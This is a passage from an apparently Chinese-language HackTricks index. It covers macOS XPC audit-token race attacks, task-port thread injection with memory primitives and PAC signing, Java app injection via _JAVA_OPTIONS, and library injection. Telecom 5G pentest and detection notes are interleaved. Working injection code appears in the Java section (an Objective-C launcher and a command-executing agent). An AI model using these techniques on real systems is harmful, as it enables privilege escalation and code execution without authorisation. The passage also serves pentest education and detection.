尽管前面的情况听起来很有前景,但在某些场景中这不会造成问题( 来自这里 ): 审计令牌通常用于授权检查,以决定是否接受连接。由于这是通过向服务端口发送消息进行的,因此 尚未建立连接 。在此端口上的更多消息将被视为额外的连接请求。因此,任何 在接受连接之前的检查都不易受攻击 (这也意味着在 -listener:shouldAcceptNewConnection: 中审计令牌是安全的)。因此,我们 正在寻找验证特定操作的 XPC 连接 。 XPC 事件处理程序是同步处理的。这意味着一个消息的事件处理程序必须在调用下一个之前完成,即使在并发调度队列中。因此,在 XPC 事件处理程序中,审计令牌不能被其他正常(非回复!)消息覆盖 。 这可能被利用的两种不同方法: 变体1: 利用 连接 到服务 A 和服务 B 服务 B 可以调用服务 A 中用户无法调用的 特权功能 服务 A 在 dispatch_async 中的连接 事件处理程序 外部 调用 xpc_connection_get_audit_token 。 因此, 不同 的消息可能会 覆盖审计令牌 ,因为它是在事件处理程序外部异步调度的。 利用将 发送 权限传递给 服务 B 的服务 A 。 因此,服务 B 实际上将 发送 消息到服务 A 。 利用 尝试 调用 特权操作 。在 RC 服务 A 检查 此 操作 的授权时, 服务 B 覆盖了审计令牌 (使利用能够调用特权操作)。 变体 2: 服务 B 可以调用服务 A 中用户无法调用的 特权功能 利用与 服务 A 连接, 发送 利用一个 期望回复 的消息到特定的 回复 端口 。 利用向 服务 B 发送一条消息,传递 该回复端口 。 当服务 B 回复 时,它 将消息发送到服务 A , 同时 利用向服务 A 发送不同的 消息 ,试图 达到特权功能 ,并期望服务 B 的回复会在完美的时刻覆盖审计令牌(竞争条件)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 漏洞总结","id":"2469","title":"漏洞总结"},"247":{"body":"Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS. Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration. 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule. Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.4 Tooling pointers (reproducible)","id":"247","title":"9.4 Tooling pointers (reproducible)"},"2470":{"body":"场景: 两个 mach 服务 A 和 B ,我们都可以连接到(基于沙箱配置文件和接受连接之前的授权检查)。 A 必须对 B 可以传递的特定操作进行 授权检查 (但我们的应用程序不能)。 例如,如果 B 拥有某些 权限 或以 root 身份运行,它可能允许他请求 A 执行特权操作。 对于此授权检查, A 异步获取审计令牌,例如通过从 dispatch_async 调用 xpc_connection_get_audit_token。 caution 在这种情况下,攻击者可以触发 竞争条件 ,使 利用 多次请求 A 执行操作 ,同时使 B 向 A 发送消息 。当 RC 成功 时, B 的 审计令牌 将在 我们的利用 的请求被 处理 时复制到内存中,从而使其 访问只有 B 可以请求的特权操作 。 这发生在 A 作为 smd 和 B 作为 diagnosticd。函数 SMJobBless 可以用于安装新的特权辅助工具(作为 root )。如果 以 root 身份运行的进程联系 smd ,将不会执行其他检查。 因此,服务 B 是 diagnosticd ,因为它以 root 身份运行并可用于 监控 进程,因此一旦监控开始,它将 每秒发送多条消息 。 进行攻击的步骤: 使用标准 XPC 协议初始化与名为 smd 的服务的 连接 。 形成与 diagnosticd 的二次 连接 。与正常程序相反,而不是创建并发送两个新的 mach 端口,客户端端口发送权限被替换为与 smd 连接相关联的 发送权限 的副本。 结果,XPC 消息可以调度到 diagnosticd,但来自 diagnosticd 的响应被重定向到 smd。对 smd 来说,来自用户和 diagnosticd 的消息似乎来自同一连接。 描述利用过程的图像 下一步是指示 diagnosticd 启动对所选进程(可能是用户自己的进程)的监控。同时,向 smd 发送大量常规 1004 消息。此操作的目的是安装具有提升权限的工具。 此操作触发 handle_bless 函数中的竞争条件。时机至关重要:xpc_connection_get_pid 函数调用必须返回用户进程的 PID(因为特权工具位于用户的应用程序包中)。然而,xpc_connection_get_audit_token 函数,特别是在 connection_is_authorized 子例程中,必须引用属于 diagnosticd 的审计令牌。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 变体 1:在事件处理程序外部调用 xpc_connection_get_audit_token","id":"2470","title":"变体 1:在事件处理程序外部调用 xpc_connection_get_audit_token"},"2471":{"body":"在 XPC(跨进程通信)环境中,尽管事件处理程序不会并发执行,但回复消息的处理具有独特的行为。具体而言,存在两种不同的方法来发送期望回复的消息: xpc_connection_send_message_with_reply :在这里,XPC 消息在指定队列上接收和处理。 xpc_connection_send_message_with_reply_sync :相反,在此方法中,XPC 消息在当前调度队列上接收和处理。 这种区别至关重要,因为它允许 回复数据包与 XPC 事件处理程序的执行并发解析 。值得注意的是,虽然 _xpc_connection_set_creds 确实实现了锁定以防止审计令牌的部分覆盖,但它并未将此保护扩展到整个连接对象。因此,这造成了一个漏洞,在解析数据包和执行其事件处理程序之间的间隔中,审计令牌可能会被替换。 要利用此漏洞,需要以下设置: 两个 mach 服务,称为 A 和 B ,都可以建立连接。 服务 A 应该对只有 B 可以执行的特定操作进行授权检查(用户的应用程序无法)。 服务 A 应该发送一条期望回复的消息。 用户可以向 B 发送一条消息, B 将对此进行回复。 利用过程涉及以下步骤: 等待服务 A 发送一条期望回复的消息。 不直接回复 A ,而是劫持回复端口并用于向服务 B 发送消息。 随后,发送涉及禁止操作的消息,期望它与来自 B 的回复并发处理。 以下是所描述攻击场景的可视化表示: ![https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/variant2.png](../../../../../../images/image (1) (1) (1) (1) (1) (1) (1).png)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 变体 2:回复转发","id":"2471","title":"变体 2:回复转发"},"2472":{"body":"定位实例的困难 :静态和动态搜索 xpc_connection_get_audit_token 使用实例都很具挑战性。 方法论 :使用 Frida 钩住 xpc_connection_get_audit_token 函数,过滤不来自事件处理程序的调用。然而,这种方法仅限于被钩住的进程,并且需要主动使用。 分析工具 :使用 IDA/Ghidra 等工具检查可达的 mach 服务,但该过程耗时,且由于涉及 dyld 共享缓存的调用而复杂。 脚本限制 :尝试为从 dispatch_async 块调用 xpc_connection_get_audit_token 的分析编写脚本时,由于解析块和与 dyld 共享缓存的交互的复杂性而受到阻碍。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 发现问题","id":"2472","title":"发现问题"},"2473":{"body":"报告问题 :向 Apple 提交了一份报告,详细说明了在 smd 中发现的一般和特定问题。 Apple 的回应 :Apple 通过将 xpc_connection_get_audit_token 替换为 xpc_dictionary_get_audit_token 解决了 smd 中的问题。 修复的性质 :xpc_dictionary_get_audit_token 函数被认为是安全的,因为它直接从与接收的 XPC 消息相关的 mach 消息中检索审计令牌。然而,它不是公共 API 的一部分,类似于 xpc_connection_get_audit_token。 缺乏更广泛的修复 :尚不清楚为什么 Apple 没有实施更全面的修复,例如丢弃与连接的保存审计令牌不一致的消息。某些场景(例如 setuid 使用)中合法审计令牌更改的可能性可能是一个因素。 当前状态 :该问题在 iOS 17 和 macOS 14 中仍然存在,给那些寻求识别和理解它的人带来了挑战。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » 修复","id":"2473","title":"修复"},"2474":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » macOS 通过任务端口进行线程注入","id":"2474","title":"macOS 通过任务端口进行线程注入"},"2475":{"body":"https://github.com/bazad/threadexec https://gist.github.com/knightsc/bd6dfeccb02b77eb6409db5601dcef36","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 代码","id":"2475","title":"代码"},"2476":{"body":"最初,task_threads() 函数在任务端口上被调用,以从远程任务获取线程列表。选择一个线程进行劫持。这种方法与传统的代码注入方法不同,因为由于阻止 thread_create_running() 的缓解措施,创建新的远程线程是被禁止的。 为了控制线程,调用 thread_suspend(),暂停其执行。 在远程线程上允许的唯一操作是 停止 和 启动 线程,以及 检索 / 修改 其寄存器值。通过将寄存器 x0 到 x7 设置为 参数 ,配置 pc 以指向所需函数,并恢复线程,从而发起远程函数调用。确保线程在返回后不崩溃需要检测返回。 一种策略是使用 thread_set_exception_ports() 为远程线程注册 异常处理程序 ,在函数调用之前将 lr 寄存器设置为无效地址。这会在函数执行后触发异常,向异常端口发送消息,使得可以检查线程的状态以恢复返回值。或者,借鉴 Ian Beer 的 triple_fetch 漏洞,将 lr 设置为无限循环;然后持续监控线程的寄存器,直到 pc 指向该指令。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 1. 线程劫持","id":"2476","title":"1. 线程劫持"},"2477":{"body":"接下来的阶段涉及建立 Mach 端口,以促进与远程线程的通信。这些端口在任务之间传输任意的发送/接收权限中起着重要作用。 为了实现双向通信,创建两个 Mach 接收权限:一个在本地任务中,另一个在远程任务中。随后,将每个端口的发送权限转移到对应的任务,从而实现消息交换。 关注本地端口,接收权限由本地任务持有。该端口通过 mach_port_allocate() 创建。挑战在于将该端口的发送权限转移到远程任务中。 一种策略是利用 thread_set_special_port() 将本地端口的发送权限放置在远程线程的 THREAD_KERNEL_PORT 中。然后,指示远程线程调用 mach_thread_self() 以检索发送权限。 对于远程端口,过程基本上是反向的。指示远程线程通过 mach_reply_port() 生成一个 Mach 端口(因为 mach_port_allocate() 不适合由于其返回机制)。在端口创建后,在远程线程中调用 mach_port_insert_right() 以建立发送权限。然后,该权限通过 thread_set_special_port() 存储在内核中。在本地任务中,使用 thread_get_special_port() 在远程线程上获取对远程任务中新分配的 Mach 端口的发送权限。 完成这些步骤后,建立了 Mach 端口,为双向通信奠定了基础。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 2. 用于通信的 Mach 端口","id":"2477","title":"2. 用于通信的 Mach 端口"},"2478":{"body":"在本节中,重点是利用执行原语建立基本的内存读/写原语。这些初步步骤对于获得对远程进程的更多控制至关重要,尽管此阶段的原语不会发挥太多作用。很快,它们将升级为更高级的版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 3. 基本内存读/写原语","id":"2478","title":"3. 基本内存读/写原语"},"2479":{"body":"目标是使用特定函数执行内存读写。对于 读取内存 : c uint64_t read_func(uint64_t *address) {\\nreturn *address;\\n} 对于 写入内存 : c void write_func(uint64_t *address, uint64_t value) {\\n*address = value;\\n} 这些函数对应以下汇编: _read_func:\\nldr x0, [x0]\\nret\\n_write_func:\\nstr x1, [x0]\\nret","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 使用执行原语进行内存读写","id":"2479","title":"使用执行原语进行内存读写"},"248":{"body":"持续检查 Registration Request 中是否包含明文 SUPI/IMSI;阻断违规设备/USIMs。 拒绝 EEA0/EIA0,除非在严格限定的紧急程序中允许;至少要求 EEA2/EIA2。 检测流氓或配置错误的基础设施:未授权的 gNB/AMF、意外的 N2 对端。 对导致 null 算法或频繁重放 InitialUEMessage 的 NAS 安全模式发出告警。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.5 Defensive checklist","id":"248","title":"9.5 Defensive checklist"},"2480":{"body":"对常见库的扫描揭示了这些操作的合适候选者: 读取内存 — property_getName() (libobjc): c const char *property_getName(objc_property_t prop) {\\nreturn prop->name;\\n} 写入内存 — _xpc_int64_set_value() (libxpc): c __xpc_int64_set_value:\\nstr x1, [x0, #0x18]\\nret 要在任意地址执行 64 位写入: c _xpc_int64_set_value(address - 0x18, value); 建立这些原语后,创建共享内存的舞台已经设定,这标志着在控制远程进程方面的重大进展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 识别合适的函数","id":"2480","title":"识别合适的函数"},"2481":{"body":"目标是在本地和远程任务之间建立共享内存,简化数据传输并促进带有多个参数的函数调用。该方法利用 libxpc 及其 OS_xpc_shmem 对象类型,该类型建立在 Mach 内存条目之上。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 4. 共享内存设置","id":"2481","title":"4. 共享内存设置"},"2482":{"body":"内存分配 使用 mach_vm_allocate() 分配共享内存。 使用 xpc_shmem_create() 为分配的区域创建 OS_xpc_shmem 对象。 在远程进程中创建共享内存 在远程进程中为 OS_xpc_shmem 对象分配内存(remote_malloc)。 复制本地模板对象;仍需修复嵌入的 Mach 发送权限,偏移量为 0x18。 修正 Mach 内存条目 使用 thread_set_special_port() 插入发送权限,并用远程条目的名称覆盖 0x18 字段。 最终化 验证远程对象并通过远程调用 xpc_shmem_remote() 进行映射。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 进程概述","id":"2482","title":"进程概述"},"2483":{"body":"一旦可以进行任意执行和共享内存后通道,您就有效地拥有了目标进程: 任意内存读/写 — 在本地和共享区域之间使用 memcpy()。 带有 > 8 个参数的函数调用 — 按照 arm64 调用约定将额外参数放在栈上。 Mach 端口传输 — 通过已建立的端口在 Mach 消息中传递权限。 文件描述符传输 — 利用文件端口(见 triple_fetch )。 所有这些都封装在 threadexec 库中,以便于重用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 5. 实现完全控制","id":"2483","title":"5. 实现完全控制"},"2484":{"body":"在 Apple Silicon 设备(arm64e)上, 指针认证码 (PAC) 保护所有返回地址和许多函数指针。线程劫持技术 重用现有代码 仍然有效,因为 lr/pc 中的原始值已经携带有效的 PAC 签名。当您尝试跳转到攻击者控制的内存时,会出现问题: 在目标内部分配可执行内存(远程 mach_vm_allocate + mprotect(PROT_EXEC))。 复制您的有效载荷。 在 远程 进程中对指针进行签名: c uint64_t ptr = (uint64_t)payload;\\nptr = ptrauth_sign_unauthenticated((void*)ptr, ptrauth_key_asia, 0); 在劫持的线程状态中设置 pc = ptr。 或者,通过链接现有的 gadgets/functions(传统 ROP)来保持 PAC 兼容。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 6. Apple Silicon (arm64e) 的细微差别","id":"2484","title":"6. Apple Silicon (arm64e) 的细微差别"},"2485":{"body":"EndpointSecurity (ES) 框架暴露了内核事件,允许防御者观察或阻止线程注入尝试: ES_EVENT_TYPE_AUTH_GET_TASK – 当一个进程请求另一个任务的端口时触发(例如 task_for_pid())。 ES_EVENT_TYPE_NOTIFY_REMOTE_THREAD_CREATE – 每当在 不同 任务中创建线程时发出。 ES_EVENT_TYPE_NOTIFY_THREAD_SET_STATE(在 macOS 14 Sonoma 中添加)– 表示对现有线程的寄存器操作。 最小的 Swift 客户端,打印远程线程事件: swift import EndpointSecurity let client = try! ESClient(subscriptions: [.notifyRemoteThreadCreate]) {\\n(_, msg) in\\nif let evt = msg.remoteThreadCreate {\\nprint(\\"[ALERT] remote thread in pid \\\\(evt.target.pid) by pid \\\\(evt.thread.pid)\\")\\n}\\n}\\nRunLoop.main.run() 使用 osquery ≥ 5.8 查询: sql SELECT target_pid, source_pid, target_path\\nFROM es_process_events\\nWHERE event_type = \'REMOTE_THREAD_CREATE\';","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 7. 使用 EndpointSecurity 进行检测和加固","id":"2485","title":"7. 使用 EndpointSecurity 进行检测和加固"},"2486":{"body":"在没有 com.apple.security.get-task-allow 权限的情况下分发您的应用程序可以防止非根用户攻击者获取其任务端口。系统完整性保护(SIP)仍然阻止访问许多 Apple 二进制文件,但第三方软件必须明确选择退出。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 加固运行时考虑","id":"2486","title":"加固运行时考虑"},"2487":{"body":"工具 年份 备注 task_vaccine 2023 演示在 Ventura/Sonoma 上进行 PAC 感知线程劫持的紧凑 PoC remote_thread_es 2024 被多个 EDR 供应商使用的 EndpointSecurity 辅助工具,用于显示 REMOTE_THREAD_CREATE 事件 阅读这些项目的源代码有助于理解在 macOS 13/14 中引入的 API 更改,并保持在 Intel ↔ Apple Silicon 之间的兼容性。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 8. 最近的公共工具(2023-2025)","id":"2487","title":"8. 最近的公共工具(2023-2025)"},"2488":{"body":"https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/ https://github.com/rodionovd/task_vaccine https://developer.apple.com/documentation/endpointsecurity/es_event_type_notify_remote_thread_create tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS Thread Injection via Task port » 参考文献","id":"2488","title":"参考文献"},"2489":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Java Applications Injection » macOS Java 应用程序注入","id":"2489","title":"macOS Java 应用程序注入"},"249":{"body":"除 SGSN/GGSN 之外的任何设备建立 Create PDP Context Requests 。 来自内部 IP 的非标准端口(53、80、443)接收 SSH 握手 。 频繁的 Echo Requests 而没有相应的 Echo Responses – 可能表示 GTPDoor 信标。 大量带有大且非零 identifier/sequence 字段的 ICMP echo-reply 流量 。 5G: InitialUEMessage 携带的 NAS Registration Requests 从相同端点重复出现 (重放信号)。 5G: NAS Security Mode 在非紧急场景协商 EEA0/EIA0 。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » Detection Ideas","id":"249","title":"Detection Ideas"},"2490":{"body":"查找安装在系统中的 Java 应用程序。注意到 Info.plist 中的 Java 应用程序将包含一些包含字符串 java. 的 Java 参数,因此您可以搜索该字符串: bash # Search only in /Applications folder\\nsudo find /Applications -name \'Info.plist\' -exec grep -l \\"java\\\\.\\" {} \\\\; 2>/dev/null # Full search\\nsudo find / -name \'Info.plist\' -exec grep -l \\"java\\\\.\\" {} \\\\; 2>/dev/null","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Java Applications Injection » 枚举","id":"2490","title":"枚举"},"2491":{"body":"环境变量 _JAVA_OPTIONS 可用于在执行编译的 Java 应用程序时注入任意 Java 参数: bash # Write your payload in a script called /tmp/payload.sh\\nexport _JAVA_OPTIONS=\'-Xms2m -Xmx5m -XX:OnOutOfMemoryError=\\"/tmp/payload.sh\\"\'\\n\\"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub\\" 要将其作为新进程而不是当前终端的子进程执行,可以使用: objectivec #import \\n// clang -fobjc-arc -framework Foundation invoker.m -o invoker int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\n// Specify the file path and content\\nNSString *filePath = @\\"/tmp/payload.sh\\";\\nNSString *content = @\\"#!/bin/bash\\\\n/Applications/iTerm.app/Contents/MacOS/iTerm2\\"; NSError *error = nil; // Write content to the file\\nBOOL success = [content writeToFile:filePath\\natomically:YES\\nencoding:NSUTF8StringEncoding\\nerror:&error]; if (!success) {\\nNSLog(@\\"Error writing file at %@\\\\n%@\\", filePath, [error localizedDescription]);\\nreturn 1;\\n} NSLog(@\\"File written successfully to %@\\", filePath); // Create a new task\\nNSTask *task = [[NSTask alloc] init]; /// Set the task\'s launch path to use the \'open\' command\\n[task setLaunchPath:@\\"/usr/bin/open\\"]; // Arguments for the \'open\' command, specifying the path to Android Studio\\n[task setArguments:@[@\\"/Applications/Android Studio.app\\"]]; // Define custom environment variables\\nNSDictionary *customEnvironment = @{\\n@\\"_JAVA_OPTIONS\\": @\\"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh\\"\\n}; // Get the current environment and merge it with custom variables\\nNSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];\\n[environment addEntriesFromDictionary:customEnvironment]; // Set the task\'s environment\\n[task setEnvironment:environment]; // Launch the task\\n[task launch];\\n}\\nreturn 0;\\n} 然而,这会在执行的应用程序上触发错误,另一种更隐蔽的方法是创建一个 Java 代理并使用: bash export _JAVA_OPTIONS=\'-javaagent:/tmp/Agent.jar\'\\n\\"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub\\" # Or open --env \\"_JAVA_OPTIONS=\'-javaagent:/tmp/Agent.jar\'\\" -a \\"Burp Suite Professional\\" caution 使用与应用程序 不同的 Java 版本 创建代理可能会导致代理和应用程序的执行崩溃 代理可以是: Agent.java import java.io.*;\\nimport java.lang.instrument.*; public class Agent {\\npublic static void premain(String args, Instrumentation inst) {\\ntry {\\nString[] commands = new String[] { \\"/usr/bin/open\\", \\"-a\\", \\"Calculator\\" };\\nRuntime.getRuntime().exec(commands);\\n}\\ncatch (Exception err) {\\nerr.printStackTrace();\\n}\\n}\\n} 要编译代理,请运行: bash javac Agent.java # Create Agent.class\\njar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar 使用 manifest.txt: Premain-Class: Agent\\nAgent-Class: Agent\\nCan-Redefine-Classes: true\\nCan-Retransform-Classes: true 然后导出环境变量并运行 Java 应用程序,如下所示: bash export _JAVA_OPTIONS=\'-javaagent:/tmp/j/Agent.jar\'\\n\\"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub\\" # Or open --env \\"_JAVA_OPTIONS=\'-javaagent:/tmp/Agent.jar\'\\" -a \\"Burp Suite Professional\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Java Applications Injection » _JAVA_OPTIONS","id":"2491","title":"_JAVA_OPTIONS"},"2492":{"body":"此文件支持在执行 Java 时指定 Java 参数 。您可以使用之前的一些技巧来更改 Java 参数并 使进程执行任意命令 。 此外,此文件还可以通过 include 目录 包含其他文件 ,因此您也可以更改包含的文件。 更重要的是,一些 Java 应用程序将 加载多个 vmoptions 文件。 一些应用程序,如 Android Studio,会在其 输出中指示它们正在查找 这些文件的位置,例如: bash /Applications/Android\\\\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions 2023-12-13 19:53:23.920 studio[74913:581359] fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions\\n2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions\\n2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions\\n2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions\\n2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions\\n2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions 如果他们没有,你可以轻松检查: bash # Monitor\\nsudo eslogger lookup | grep vmoption # Give FDA to the Terminal # Launch the Java app\\n/Applications/Android\\\\ Studio.app/Contents/MacOS/studio 注意到在这个例子中,Android Studio 正在尝试加载文件 /Applications/Android Studio.app.vmoptions ,这是任何来自 admin 组的用户都有写入权限的地方。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Java Applications Injection » vmoptions 文件","id":"2492","title":"vmoptions 文件"},"2493":{"body":"Reading time: 18 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 caution dyld 的代码是开源的 ,可以在 https://opensource.apple.com/source/dyld/ 找到,并且可以使用 URL 如 https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz 下载为 tar。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Library Injection","id":"2493","title":"macOS Library Injection"},"2494":{"body":"查看 Dyld 如何在二进制文件中加载库: macOS Dyld Process","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Dyld 进程","id":"2494","title":"Dyld 进程"},"2495":{"body":"这类似于 Linux 上的 LD_PRELOAD 。它允许指示即将运行的进程从路径加载特定库(如果环境变量已启用)。 此技术也可以 作为 ASEP 技术使用 ,因为每个安装的应用程序都有一个名为 \\"Info.plist\\" 的 plist,允许使用名为 LSEnvironmental 的键 分配环境变量 。 tip 自 2012 年以来, Apple 大幅减少了 DYLD_INSERT_LIBRARIES 的权限。 查看代码并 检查 src/dyld.cpp 。在函数 pruneEnvironmentVariables 中,您可以看到 DYLD_* 变量被移除。 在函数 processRestricted 中,设置了限制的原因。检查该代码,您可以看到原因包括: 二进制文件是 setuid/setgid macho 二进制文件中存在 __RESTRICT/__restrict 部分。 软件具有权限(强化运行时),但没有 com.apple.security.cs.allow-dyld-environment-variables 权限。 使用以下命令检查二进制文件的 权限 :codesign -dv --entitlements :- 在更新版本中,您可以在函数 configureProcessRestrictions 的第二部分找到此逻辑。然而,在较新版本中执行的是函数的 开始检查 (您可以删除与 iOS 或模拟相关的 if,因为这些在 macOS 中不会使用)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » DYLD_INSERT_LIBRARIES","id":"2495","title":"DYLD_INSERT_LIBRARIES"},"2496":{"body":"即使二进制文件允许使用 DYLD_INSERT_LIBRARIES 环境变量,如果二进制文件检查要加载的库的签名,它也不会加载自定义库。 为了加载自定义库,二进制文件需要具有 以下任一权限 : com.apple.security.cs.disable-library-validation com.apple.private.security.clear-library-validation 或者二进制文件 不应该 具有 强化运行时标志 或 库验证标志 。 您可以使用 codesign --display --verbose 检查二进制文件是否具有 强化运行时 ,检查 CodeDirectory 中的 runtime 标志,如: CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded 。 如果库 使用与二进制文件相同的证书签名 ,您也可以加载该库。 找到一个示例,了解如何(滥用)此功能并检查限制: macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » 库验证","id":"2496","title":"库验证"},"2497":{"body":"caution 请记住, 先前的库验证限制也适用于 执行 Dylib 劫持攻击。 与 Windows 一样,在 MacOS 